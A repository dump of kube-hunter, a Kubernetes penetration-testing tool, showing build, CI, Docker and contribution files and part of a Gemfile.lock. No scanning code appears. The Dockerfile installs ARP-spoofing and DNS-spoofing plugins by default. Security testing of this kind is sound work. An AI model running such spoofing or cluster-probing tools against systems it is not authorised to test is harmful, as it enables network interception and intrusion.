├── .dockerignore
├── .flake8
├── .github
│   ├── ISSUE_TEMPLATE
│   │   ├── bug_report.md
│   │   ├── feature_request.md
│   │   └── support_question.md
│   ├── PULL_REQUEST_TEMPLATE.md
│   └── workflows
│       ├── lint.yml
│       ├── publish.yml
│       ├── release.yml
│       └── test.yml
├── .gitignore
├── .pre-commit-config.yaml
├── .yamllint
├── CONTRIBUTING.md
├── Dockerfile
├── LICENSE
├── MITRE.png
├── Makefile
├── NOTICE
├── README.md
├── SECURITY.md
├── docs
│   ├── .gitignore
│   ├── Gemfile
│   ├── Gemfile.lock
│   ├── _config.yml
│   ├── _kb
│   │   ├── KHV002.md
│   │   ├── KHV003.md
│   │   ├── KHV004.md
│   │   ├── KHV005.md
│   │   ├── KHV006.md
│   │   ├── KHV007.md
│   │   ├── KHV020.md
│   │   ├── KHV021.md
│   │   ├── KHV022.md
│   │   ├── KHV023.md
│   │   ├── KHV024.md
│   │   ├── KHV025.md
│   │   ├── KHV026.md
│   │   ├── KHV027.md
│   │   ├── KHV028.md
│   │   ├── KHV029.md
│   │   ├── KHV030.md
│   │   ├── KHV031.md
│   │   ├── KHV032.md
│   │   ├── KHV033.md
│   │   ├── KHV034.md
│   │   ├── KHV036.md
│   │   ├── KHV037.md
│   │   ├── KHV038.md
│   │   ├── KHV039.md
│   │   ├── KHV040.md
│   │   ├── KHV041.md
│   │   ├── KHV042.md
│   │   ├── KHV043.md
│   │   ├── KHV044.md
│   │   ├── KHV045.md
│   │   ├── KHV046.md
│   │   ├── KHV047.md
│   │   ├── KHV049.md
│   │   ├── KHV050.md
│   │   ├── KHV051.md
│   │   ├── KHV052.md
│   │   └── KHV053.md
│   ├── _layouts
│   │   └── default.html
│   ├── index.md
│   └── kbindex.html
├── job.yaml
├── kube-hunter-screenshot.png
├── kube-hunter.png
├── kube-hunter.py
├── kube_hunter
│   ├── README.md
│   ├── __init__.py
│   ├── __main__.py
│   ├── conf
│   │   ├── __init__.py
│   │   ├── logging.py
│   │   └── parser.py
│   ├── core
│   │   ├── __init__.py
│   │   ├── events
│   │   │   ├── __init__.py
│   │   │   ├── event_handler.py
│   │   │   └── types.py
│   │   └── types
│   │       ├── __init__.py
│   │       ├── components.py
│   │       ├── hunters.py
│   │       └── vulnerabilities.py
│   ├── modules
│   │   ├── __init__.py
│   │   ├── discovery
│   │   │   ├── __init__.py
│   │   │   ├── apiserver.py
│   │   │   ├── dashboard.py
│   │   │   ├── etcd.py
│   │   │   ├── hosts.py
│   │   │   ├── kubectl.py
│   │   │   ├── kubelet.py
│   │   │   ├── kubernetes_client.py
│   │   │   ├── ports.py
│   │   │   └── proxy.py
│   │   ├── hunting
│   │   │   ├── __init__.py
│   │   │   ├── aks.py
│   │   │   ├── apiserver.py
│   │   │   ├── capabilities.py
│   │   │   ├── certificates.py
│   │   │   ├── cves.py
│   │   │   ├── dashboard.py
│   │   │   ├── etcd.py
│   │   │   ├── kubelet.py
│   │   │   ├── mounts.py
│   │   │   ├── proxy.py
│   │   │   └── secrets.py
│   │   └── report
│   │       ├── __init__.py
│   │       ├── base.py
│   │       ├── collector.py
│   │       ├── dispatchers.py
│   │       ├── factory.py
│   │       ├── json.py
│   │       ├── plain.py
│   │       └── yaml.py
│   └── plugins
│       ├── __init__.py
│       └── hookspecs.py
├── mypy.ini
├── pyinstaller_hooks
│   └── hook-prettytable.py
├── pyproject.toml
├── requirements-dev.txt
├── requirements.txt
├── setup.cfg
├── setup.py
└── tests
    ├── __init__.py
    ├── conf
    │   └── test_logging.py
    ├── core
    │   ├── test_cloud.py
    │   ├── test_handler.py
    │   └── test_subscribe.py
    ├── discovery
    │   ├── test_apiserver.py
    │   ├── test_hosts.py
    │   └── test_k8s.py
    ├── hunting
    │   ├── test_aks.py
    │   ├── test_apiserver_hunter.py
    │   ├── test_certificates.py
    │   ├── test_cvehunting.py
    │   ├── test_dashboard.py
    │   └── test_kubelet.py
    ├── modules
    │   └── test_reports.py
    └── plugins
        ├── test_hooks.py
        └── test_plugins_hooks.py
/.dockerignore:
--------------------------------------------------------------------------------
1 | *.png
2 | tests/
3 | docs/
4 | .github/
5 |
--------------------------------------------------------------------------------
/.flake8:
--------------------------------------------------------------------------------
1 | [flake8]
2 | ignore = E203, E266, E501, W503, B903, T499, B020
3 | max-line-length = 120
4 | max-complexity = 18
5 | select = B,C,E,F,W,B9,T4
6 | mypy_config=mypy.ini
7 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: I would like to report a bug within the project
4 | labels: bug
5 | ---
6 |
7 | ### What happened
8 |
9 |
12 |
13 | ### Expected behavior
14 |
15 |
18 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature Request
3 | about: I have a suggestion (and might want to implement it myself)
4 | labels: enhancement
5 | ---
6 |
7 | ## What would you like to be added
8 |
9 |
12 |
13 | ## Why is this needed
14 |
15 |
18 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/support_question.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Support Question
3 | about: I have a question and require assistance
4 | labels: question
5 | ---
6 |
7 |
11 |
12 | ## What are you trying to achieve
13 |
14 |
17 |
18 | ## Minimal example (if applicable)
19 |
20 |
24 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 |
5 |
6 | ## Description
7 | Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.
8 |
9 | ## Contribution Guidelines
10 | Please read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).
11 |
12 | ## Fixed Issues
13 |
14 | Please mention any issues fixed in the PR by referencing them properly in the commit message.
15 | As per convention, use appropriate keywords such as `fixes`, `closes`, or `resolves` to automatically link the issue.
16 | Please consult the [official GitHub documentation](https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords) for details.
17 |
18 | Fixes #(issue)
19 |
20 | ## "BEFORE" and "AFTER" output
21 |
22 | To verify that the change works as desired, please include an output of terminal before and after the changes under headings "BEFORE" and "AFTER".
23 |
24 | ### BEFORE
25 | Any Terminal Output Before Changes.
26 |
27 | ### AFTER
28 | Any Terminal Output After Changes.
29 |
30 | ## Contribution checklist
31 | - [ ] I have read the Contributing Guidelines.
32 | - [ ] The commits refer to an active issue in the repository.
33 | - [ ] I have added automated testing to cover this case.
34 |
35 | ## Notes
36 | Please mention if you have not checked any of the above boxes.
37 |
--------------------------------------------------------------------------------
/.github/workflows/lint.yml:
--------------------------------------------------------------------------------
1 | ---
2 | name: Lint
3 |
4 | on: [push, pull_request]
5 |
6 | jobs:
7 | build:
8 | runs-on: ubuntu-20.04
9 |
10 | steps:
11 | - uses: actions/checkout@v2
12 | - uses: actions/setup-python@v2
13 | - uses: pre-commit/action@v2.0.0
14 | - uses: ibiqlik/action-yamllint@v3
15 |
--------------------------------------------------------------------------------
/.github/workflows/publish.yml:
--------------------------------------------------------------------------------
1 | ---
2 | name: Publish
3 | on:
4 | push:
5 | tags:
6 | - "v*"
7 | env:
8 | ALIAS: aquasecurity
9 | REP: kube-hunter
10 | jobs:
11 | dockerhub:
12 | name: Publish To Docker Hub
13 | runs-on: ubuntu-18.04
14 | steps:
15 | - name: Check Out Repo
16 | uses: actions/checkout@v2
17 | - name: Set up QEMU
18 | uses: docker/setup-qemu-action@v1
19 | - name: Set up Docker Buildx
20 | id: buildx
21 | uses: docker/setup-buildx-action@v1
22 | - name: Cache Docker layers
23 | uses: actions/cache@v2
24 | with:
25 | path: /tmp/.buildx-cache
26 | key: ${{ runner.os }}-buildxarch-${{ github.sha }}
27 | restore-keys: |
28 | ${{ runner.os }}-buildxarch-
29 | - name: Login to Docker Hub
30 | uses: docker/login-action@v1
31 | with:
32 | username: ${{ secrets.DOCKERHUB_USER }}
33 | password: ${{ secrets.DOCKERHUB_TOKEN }}
34 | - name: Login to ECR
35 | uses: docker/login-action@v1
36 | with:
37 | registry: public.ecr.aws
38 | username: ${{ secrets.ECR_ACCESS_KEY_ID }}
39 | password: ${{ secrets.ECR_SECRET_ACCESS_KEY }}
40 | - name: Get version
41 | id: get_version
42 | uses: crazy-max/ghaction-docker-meta@v3
43 | with:
44 | images: ${{ env.REP }}
45 | tag-semver: |
46 | {{version}}
47 |
48 | - name: Build and push - Docker/ECR
49 | id: docker_build
50 | uses: docker/build-push-action@v2
51 | with:
52 | context: .
53 | platforms: linux/amd64
54 | builder: ${{ steps.buildx.outputs.name }}
55 | push: true
56 | tags: |
57 | ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
58 | public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
59 | ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:latest
60 | public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:latest
61 | cache-from: type=local,src=/tmp/.buildx-cache/release
62 | cache-to: type=local,mode=max,dest=/tmp/.buildx-cache/release
63 |
64 | - name: Image digest
65 | run: echo ${{ steps.docker_build.outputs.digest }}
66 |
67 | pypi:
68 | name: Publish To PyPI
69 | runs-on: ubuntu-18.04
70 | steps:
71 | - name: Checkout code
72 | uses: actions/checkout@v2
73 |
74 | - name: Set up Python
75 | uses: actions/setup-python@v2
76 | with:
77 | python-version: '3.9'
78 |
79 | - name: Install dependencies
80 | shell: bash
81 | run: |
82 | pip install -U pip
83 | make deps
84 |
85 | - name: Build project
86 | shell: bash
87 | run: |
88 | python -m pip install wheel
89 | make build
90 |
91 | - name: Publish distribution package to PyPI
92 | if: startsWith(github.ref, 'refs/tags')
93 | uses: pypa/gh-action-pypi-publish@master
94 | with:
95 | password: ${{ secrets.PYPI_API_TOKEN }}
96 |
--------------------------------------------------------------------------------
/.github/workflows/release.yml:
--------------------------------------------------------------------------------
1 | ---
2 | on:
3 | push:
4 | # Sequence of patterns matched against refs/tags
5 | tags:
6 | - 'v*' # Push events to matching v*, i.e. v1.0, v20.15.10
7 |
8 | name: Release
9 |
10 | jobs:
11 | build:
12 | name: Upload Release Asset
13 | runs-on: ubuntu-18.04
14 | steps:
15 | - name: Checkout code
16 | uses: actions/checkout@v2
17 |
18 | - name: Set up Python
19 | uses: actions/setup-python@v2
20 | with:
21 | python-version: '3.8'
22 |
23 | - name: Install dependencies
24 | shell: bash
25 | run: |
26 | pip install -U pip
27 | pip install pyinstaller
28 | make deps
29 |
30 | - name: Build project
31 | shell: bash
32 | run: |
33 | make pyinstaller
34 |
35 | - name: Create Release
36 | id: create_release
37 | uses: actions/create-release@v1
38 | env:
39 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
40 | with:
41 | tag_name: ${{ github.ref }}
42 | release_name: ${{ github.ref }}
43 | draft: false
44 | prerelease: false
45 |
46 | - name: Upload Release Asset
47 | id: upload-release-asset
48 | uses: actions/upload-release-asset@v1
49 | env:
50 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
51 | with:
52 | upload_url: ${{ steps.create_release.outputs.upload_url }}
53 | asset_path: ./dist/kube-hunter
54 | asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
55 | asset_content_type: application/octet-stream
56 |
--------------------------------------------------------------------------------
/.github/workflows/test.yml:
--------------------------------------------------------------------------------
1 | ---
2 | name: Test
3 |
4 | on: [push, pull_request]
5 |
6 | env:
7 | FORCE_COLOR: 1
8 |
9 | jobs:
10 | build:
11 | runs-on: ${{ matrix.os }}
12 | strategy:
13 | fail-fast: false
14 | matrix:
15 | python-version: ["3.6", "3.7", "3.8", "3.9"]
16 | os: [ubuntu-20.04, ubuntu-18.04]
17 |
18 | steps:
19 | - uses: actions/checkout@v2
20 |
21 | - name: Set up Python ${{ matrix.python-version }}
22 | uses: actions/setup-python@v2
23 | with:
24 | python-version: ${{ matrix.python-version }}
25 |
26 | - name: Get pip cache dir
27 | id: pip-cache
28 | run: |
29 | echo "::set-output name=dir::$(pip cache dir)"
30 |
31 | - name: Cache
32 | uses: actions/cache@v2
33 | with:
34 | path: ${{ steps.pip-cache.outputs.dir }}
35 | key:
36 | ${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
37 | restore-keys: |
38 | ${{ matrix.os }}-${{ matrix.python-version }}-
39 |
40 | - name: Install dependencies
41 | shell: bash
42 | run: |
43 | pip install -U pip
44 | make dev-deps
45 | make install
46 |
47 | - name: Test
48 | shell: bash
49 | run: |
50 | make test
51 |
52 | - name: Upload coverage
53 | uses: codecov/codecov-action@v1
54 | with:
55 | name: ${{ matrix.os }} Python ${{ matrix.python-version }}
56 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | .venv
3 | *aqua*
4 | venv/
5 | .vscode
6 | .coverage
7 | .idea
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | lib/
18 | lib64/
19 | parts/
20 | sdist/
21 | var/
22 | *.egg-info/
23 | .installed.cfg
24 | *.egg
25 | *.spec
26 | .eggs
27 | pip-wheel-metadata
28 |
29 | # Directory Cache Files
30 | .DS_Store
31 | thumbs.db
32 | __pycache__
33 | .mypy_cache
34 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | repos:
3 | - repo: https://github.com/psf/black
4 | rev: stable
5 | hooks:
6 | - id: black
7 | - repo: https://gitlab.com/pycqa/flake8
8 | rev: 3.7.9
9 | hooks:
10 | - id: flake8
11 | additional_dependencies: [flake8-bugbear]
12 |
--------------------------------------------------------------------------------
/.yamllint:
--------------------------------------------------------------------------------
1 | ---
2 | extends: default
3 |
4 | rules:
5 | line-length: disable
6 | truthy: disable
7 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | ## Contribution Guide
2 |
3 | ## Welcome Aboard
4 |
5 | Thank you for taking interest in contributing to kube-hunter!
6 | This guide will walk you through the development process of kube-hunter.
7 |
8 | ## Setting Up
9 |
10 | kube-hunter is written in Python 3 and supports versions 3.6 and above.
11 | You'll probably want to create a virtual environment for your local project.
12 | Once you've got your project and IDE set up, you can run `make dev-deps` and start contributing!
13 | You may also install a pre-commit hook to take care of linting - `pre-commit install`.
14 |
15 | ## Issues
16 |
17 | - Feel free to open issues for any reason as long as you make it clear if this issue is about a bug/feature/hunter/question/comment.
18 | Please spend a small amount of time doing due diligence on the issue tracker. Your issue might be a duplicate. If it is, please add your comment to the existing issue.
19 | - Remember users might be searching for your issue in the future, so please give it a meaningful title to help others.
20 | - The issue should clearly explain the reason for opening, the proposal if you have any, and any relevant technical information.
21 |
22 | ## Pull Requests
23 |
24 | 1. Every Pull Request should have an associated Issue unless you are fixing a trivial documentation issue.
25 | 1. Your PR is more likely to be accepted if it focuses on just one change.
26 | 1. Describe what the PR does. There's no convention enforced, but please try to be concise and descriptive. Treat the PR description as a commit message. Titles that start with "fix"/"add"/"improve"/"remove" are good examples.
27 | 1. Please add the associated Issue in the PR description.
28 | 1. There's no need to add or tag reviewers.
29 | 1. If a reviewer commented on your code or asked for changes, please remember to mark the discussion as resolved after you address it. PRs with unresolved issues should not be merged (even if the comment is unclear or requires no action from your side).
30 | 1. Please include a comment with the results before and after your change.
31 | 1. Your PR is more likely to be accepted if it includes tests (We have not historically been very strict about tests, but we would like to improve this!).
32 |
33 | ## Hunters
34 |
35 | If you are contributing a new Hunter:
36 | 1. When you open an issue to present the Hunter, please specify which `Vulnerability` classes you plan to add.
37 | 1. A maintainer will assign each `Vulnerability` a VID for you to include in your Hunter code.
38 | 1. Please add a KB article to `/docs/kb/` explaining the vulnerability and suggesting remediation steps. Look at other articles for examples.
39 | 1. Please adhere to the following type conventions (see the sketch below): use the `Hunter` class to report vulnerabilities, `ActiveHunter` if your Hunter might change the state of the cluster, and `Discovery` for scanning the cluster (all are descendants of `HunterBase`). Also, use the `Vulnerability` class to report findings, and `Service` to report a discovery to be used by a hunter (both are descendants of `Event`; refrain from using `Event` directly).
40 |
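For illustration, here is a minimal, schematic Hunter following these conventions. It is a sketch only: the names (`ExampleService`, `ExampleDisclosure`, `KHV000`) are placeholders, and the exact constructor signatures should be checked against the real hunters under `kube_hunter/modules/hunting/`.

```python
# Schematic example of the Hunter/Service/Vulnerability conventions.
# All names are placeholders; this is not an actual kube-hunter module.
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Event, Service, Vulnerability
from kube_hunter.core.types import Hunter, KubernetesCluster, InformationDisclosure


class ExampleService(Service, Event):
    """A discovered service, normally published by a Discovery class."""

    def __init__(self):
        Service.__init__(self, name="Example Service")


class ExampleDisclosure(Vulnerability, Event):
    """A finding; the vid is assigned by a maintainer (KHV000 is a placeholder)."""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Example Information Disclosure",
            category=InformationDisclosure,
            vid="KHV000",
        )
        self.evidence = evidence


@handler.subscribe(ExampleService)
class ExampleHunter(Hunter):
    """Passive hunter, triggered whenever an ExampleService event is published."""

    def __init__(self, event):
        self.event = event

    def execute(self):
        # Probe the service here; publish a Vulnerability event for each finding.
        self.publish_event(ExampleDisclosure(evidence="example evidence"))
```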
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.8-alpine as builder
2 |
3 | RUN apk add --no-cache \
4 | linux-headers \
5 | tcpdump \
6 | build-base \
7 | ebtables \
8 | make \
9 | git && \
10 | apk upgrade --no-cache
11 |
12 | WORKDIR /kube-hunter
13 | COPY setup.py setup.cfg Makefile ./
14 | RUN make deps
15 |
16 | COPY . .
17 | RUN make install
18 |
19 | FROM python:3.8-alpine
20 |
21 | RUN apk add --no-cache \
22 | tcpdump \
23 | ebtables && \
24 | apk upgrade --no-cache
25 |
26 | COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
27 | COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter
28 |
29 | # Add default plugins: https://github.com/aquasecurity/kube-hunter-plugins
30 | RUN pip install kube-hunter-arp-spoof>=0.0.3 kube-hunter-dns-spoof>=0.0.3
31 |
32 | ENTRYPOINT ["kube-hunter"]
33 |
--------------------------------------------------------------------------------
/MITRE.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/MITRE.png
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | .SILENT: clean
2 |
3 | NAME := kube-hunter
4 | SRC := kube_hunter
5 | ENTRYPOINT := $(SRC)/__main__.py
6 | DIST := dist
7 | COMPILED := $(DIST)/$(NAME)
8 | STATIC_COMPILED := $(COMPILED).static
9 |
10 |
11 | .PHONY: deps
12 | deps:
13 | 	requires=$(shell mktemp); \
14 | 	python setup.py -q dependencies > $$requires; \
15 | 	pip install -r $$requires; \
16 | 	rm $$requires
17 |
18 | .PHONY: dev-deps
19 | dev-deps:
20 | pip install -r requirements-dev.txt
21 |
22 | .PHONY: lint
23 | lint:
24 | black .
25 | flake8
26 |
27 | .PHONY: lint-check
28 | lint-check:
29 | flake8
30 | black --check --diff .
31 |
32 | .PHONY: test
33 | test:
34 | python -m pytest
35 |
36 | .PHONY: build
37 | build:
38 | python setup.py sdist bdist_wheel
39 |
40 | .PHONY: pyinstaller
41 | pyinstaller: deps
42 | python setup.py pyinstaller
43 |
44 | .PHONY: staticx_deps
45 | staticx_deps:
46 | command -v patchelf > /dev/null 2>&1 || (echo "patchelf is not available. install it in order to use staticx" && false)
47 |
48 | .PHONY: pyinstaller_static
49 | pyinstaller_static: staticx_deps pyinstaller
50 | staticx $(COMPILED) $(STATIC_COMPILED)
51 |
52 | .PHONY: install
53 | install:
54 | pip install .
55 |
56 | .PHONY: uninstall
57 | uninstall:
58 | pip uninstall $(NAME)
59 |
60 | .PHONY: publish
61 | publish:
62 | twine upload dist/*
63 |
64 | .PHONY: clean
65 | clean:
66 | rm -rf build/ dist/ *.egg-info/ .eggs/ .pytest_cache/ .mypy_cache .coverage *.spec
67 | find . -type d -name __pycache__ -exec rm -rf '{}' +
68 |
--------------------------------------------------------------------------------
/NOTICE:
--------------------------------------------------------------------------------
1 | kube-hunter
2 | Copyright 2018-2019 Aqua Security Software Ltd.
3 |
4 | This product includes software developed by Aqua Security (https://aquasec.com).
5 |
--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
1 | # Security Policy
2 |
3 | ## Supported Versions
4 |
5 | | Version | Supported |
6 | | --------- | ------------------ |
7 | | 0.4.x | :white_check_mark: |
8 | | 0.3.x | :white_check_mark: |
9 |
10 | ## Reporting a Vulnerability
11 | We encourage you to find vulnerabilities in kube-hunter.
12 | The process is simple: just open a Bug issue, and we will take a look at it.
13 | If you prefer to disclose privately, you can write to one of the security maintainers at:
14 |
15 | | Name | Email |
16 | | ----------- | ------------------ |
17 | | Daniel Sagi | daniel.sagi@aquasec.com |
18 |
--------------------------------------------------------------------------------
/docs/.gitignore:
--------------------------------------------------------------------------------
1 | _site
--------------------------------------------------------------------------------
/docs/Gemfile:
--------------------------------------------------------------------------------
1 | source 'https://rubygems.org'
2 | gem 'github-pages', group: :jekyll_plugins
3 | gem 'jekyll-sitemap'
--------------------------------------------------------------------------------
/docs/Gemfile.lock:
--------------------------------------------------------------------------------
1 | GEM
2 | remote: https://rubygems.org/
3 | specs:
4 | activesupport (6.0.3.4)
5 | concurrent-ruby (~> 1.0, >= 1.0.2)
6 | i18n (>= 0.7, < 2)
7 | minitest (~> 5.1)
8 | tzinfo (~> 1.1)
9 | zeitwerk (~> 2.2, >= 2.2.2)
10 | addressable (2.7.0)
11 | public_suffix (>= 2.0.2, < 5.0)
12 | coffee-script (2.4.1)
13 | coffee-script-source
14 | execjs
15 | coffee-script-source (1.11.1)
16 | colorator (1.1.0)
17 | commonmarker (0.17.13)
18 | ruby-enum (~> 0.5)
19 | concurrent-ruby (1.1.7)
20 | dnsruby (1.61.5)
21 | simpleidn (~> 0.1)
22 | em-websocket (0.5.2)
23 | eventmachine (>= 0.12.9)
24 | http_parser.rb (~> 0.6.0)
25 | ethon (0.12.0)
26 | ffi (>= 1.3.0)
27 | eventmachine (1.2.7)
28 | execjs (2.7.0)
29 | faraday (1.3.0)
30 | faraday-net_http (~> 1.0)
31 | multipart-post (>= 1.2, < 3)
32 | ruby2_keywords
33 | faraday-net_http (1.0.1)
34 | ffi (1.14.2)
35 | forwardable-extended (2.6.0)
36 | gemoji (3.0.1)
37 | github-pages (209)
38 | github-pages-health-check (= 1.16.1)
39 | jekyll (= 3.9.0)
40 | jekyll-avatar (= 0.7.0)
41 | jekyll-coffeescript (= 1.1.1)
42 | jekyll-commonmark-ghpages (= 0.1.6)
43 | jekyll-default-layout (= 0.1.4)
44 | jekyll-feed (= 0.15.1)
45 | jekyll-gist (= 1.5.0)
46 | jekyll-github-metadata (= 2.13.0)
47 | jekyll-mentions (= 1.6.0)
48 | jekyll-optional-front-matter (= 0.3.2)
49 | jekyll-paginate (= 1.1.0)
50 | jekyll-readme-index (= 0.3.0)
51 | jekyll-redirect-from (= 0.16.0)
52 | jekyll-relative-links (= 0.6.1)
53 | jekyll-remote-theme (= 0.4.2)
54 | jekyll-sass-converter (= 1.5.2)
55 | jekyll-seo-tag (= 2.6.1)
56 | jekyll-sitemap (= 1.4.0)
57 | jekyll-swiss (= 1.0.0)
58 | jekyll-theme-architect (= 0.1.1)
59 | jekyll-theme-cayman (= 0.1.1)
60 | jekyll-theme-dinky (= 0.1.1)
61 | jekyll-theme-hacker (= 0.1.2)
62 | jekyll-theme-leap-day (= 0.1.1)
63 | jekyll-theme-merlot (= 0.1.1)
64 | jekyll-theme-midnight (= 0.1.1)
65 | jekyll-theme-minimal (= 0.1.1)
66 | jekyll-theme-modernist (= 0.1.1)
67 | jekyll-theme-primer (= 0.5.4)
68 | jekyll-theme-slate (= 0.1.1)
69 | jekyll-theme-tactile (= 0.1.1)
70 | jekyll-theme-time-machine (= 0.1.1)
71 | jekyll-titles-from-headings (= 0.5.3)
72 | jemoji (= 0.12.0)
73 | kramdown (= 2.3.0)
74 | kramdown-parser-gfm (= 1.1.0)
75 | liquid (= 4.0.3)
76 | mercenary (~> 0.3)
77 | minima (= 2.5.1)
78 | nokogiri (>= 1.10.4, < 2.0)
79 | rouge (= 3.23.0)
80 | terminal-table (~> 1.4)
81 | github-pages-health-check (1.16.1)
82 | addressable (~> 2.3)
83 | dnsruby (~> 1.60)
84 | octokit (~> 4.0)
85 | public_suffix (~> 3.0)
86 | typhoeus (~> 1.3)
87 | html-pipeline (2.14.0)
88 | activesupport (>= 2)
89 | nokogiri (>= 1.4)
90 | http_parser.rb (0.6.0)
91 | i18n (0.9.5)
92 | concurrent-ruby (~> 1.0)
93 | jekyll (3.9.0)
94 | addressable (~> 2.4)
95 | colorator (~> 1.0)
96 | em-websocket (~> 0.5)
97 | i18n (~> 0.7)
98 | jekyll-sass-converter (~> 1.0)
99 | jekyll-watch (~> 2.0)
100 | kramdown (>= 1.17, < 3)
101 | liquid (~> 4.0)
102 | mercenary (~> 0.3.3)
103 | pathutil (~> 0.9)
104 | rouge (>= 1.7, < 4)
105 | safe_yaml (~> 1.0)
106 | jekyll-avatar (0.7.0)
107 | jekyll (>= 3.0, < 5.0)
108 | jekyll-coffeescript (1.1.1)
109 | coffee-script (~> 2.2)
110 | coffee-script-source (~> 1.11.1)
111 | jekyll-commonmark (1.3.1)
112 | commonmarker (~> 0.14)
113 | jekyll (>= 3.7, < 5.0)
114 | jekyll-commonmark-ghpages (0.1.6)
115 | commonmarker (~> 0.17.6)
116 | jekyll-commonmark (~> 1.2)
117 | rouge (>= 2.0, < 4.0)
118 | jekyll-default-layout (0.1.4)
119 | jekyll (~> 3.0)
120 | jekyll-feed (0.15.1)
121 | jekyll (>= 3.7, < 5.0)
122 | jekyll-gist (1.5.0)
123 | octokit (~> 4.2)
124 | jekyll-github-metadata (2.13.0)
125 | jekyll (>= 3.4, < 5.0)
126 | octokit (~> 4.0, != 4.4.0)
127 | jekyll-mentions (1.6.0)
128 | html-pipeline (~> 2.3)
129 | jekyll (>= 3.7, < 5.0)
130 | jekyll-optional-front-matter (0.3.2)
131 | jekyll (>= 3.0, < 5.0)
132 | jekyll-paginate (1.1.0)
133 | jekyll-readme-index (0.3.0)
134 | jekyll (>= 3.0, < 5.0)
135 | jekyll-redirect-from (0.16.0)
136 | jekyll (>= 3.3, < 5.0)
137 | jekyll-relative-links (0.6.1)
138 | jekyll (>= 3.3, < 5.0)
139 | jekyll-remote-theme (0.4.2)
140 | addressable (~> 2.0)
141 | jekyll (>= 3.5, < 5.0)
142 | jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
143 | rubyzip (>= 1.3.0, < 3.0)
144 | jekyll-sass-converter (1.5.2)
145 | sass (~> 3.4)
146 | jekyll-seo-tag (2.6.1)
147 | jekyll (>= 3.3, < 5.0)
148 | jekyll-sitemap (1.4.0)
149 | jekyll (>= 3.7, < 5.0)
150 | jekyll-swiss (1.0.0)
151 | jekyll-theme-architect (0.1.1)
152 | jekyll (~> 3.5)
153 | jekyll-seo-tag (~> 2.0)
154 | jekyll-theme-cayman (0.1.1)
155 | jekyll (~> 3.5)
156 | jekyll-seo-tag (~> 2.0)
157 | jekyll-theme-dinky (0.1.1)
158 | jekyll (~> 3.5)
159 | jekyll-seo-tag (~> 2.0)
160 | jekyll-theme-hacker (0.1.2)
161 | jekyll (> 3.5, < 5.0)
162 | jekyll-seo-tag (~> 2.0)
163 | jekyll-theme-leap-day (0.1.1)
164 | jekyll (~> 3.5)
165 | jekyll-seo-tag (~> 2.0)
166 | jekyll-theme-merlot (0.1.1)
167 | jekyll (~> 3.5)
168 | jekyll-seo-tag (~> 2.0)
169 | jekyll-theme-midnight (0.1.1)
170 | jekyll (~> 3.5)
171 | jekyll-seo-tag (~> 2.0)
172 | jekyll-theme-minimal (0.1.1)
173 | jekyll (~> 3.5)
174 | jekyll-seo-tag (~> 2.0)
175 | jekyll-theme-modernist (0.1.1)
176 | jekyll (~> 3.5)
177 | jekyll-seo-tag (~> 2.0)
178 | jekyll-theme-primer (0.5.4)
179 | jekyll (> 3.5, < 5.0)
180 | jekyll-github-metadata (~> 2.9)
181 | jekyll-seo-tag (~> 2.0)
182 | jekyll-theme-slate (0.1.1)
183 | jekyll (~> 3.5)
184 | jekyll-seo-tag (~> 2.0)
185 | jekyll-theme-tactile (0.1.1)
186 | jekyll (~> 3.5)
187 | jekyll-seo-tag (~> 2.0)
188 | jekyll-theme-time-machine (0.1.1)
189 | jekyll (~> 3.5)
190 | jekyll-seo-tag (~> 2.0)
191 | jekyll-titles-from-headings (0.5.3)
192 | jekyll (>= 3.3, < 5.0)
193 | jekyll-watch (2.2.1)
194 | listen (~> 3.0)
195 | jemoji (0.12.0)
196 | gemoji (~> 3.0)
197 | html-pipeline (~> 2.2)
198 | jekyll (>= 3.0, < 5.0)
199 | kramdown (2.3.0)
200 | rexml (>= 3.2.5)
201 | kramdown-parser-gfm (1.1.0)
202 | kramdown (>= 2.3.1)
203 | liquid (4.0.3)
204 | listen (3.4.0)
205 | rb-fsevent (~> 0.10, >= 0.10.3)
206 | rb-inotify (~> 0.9, >= 0.9.10)
207 | mercenary (0.3.6)
208 | mini_portile2 (2.5.0)
209 | minima (2.5.1)
210 | jekyll (>= 3.5, < 5.0)
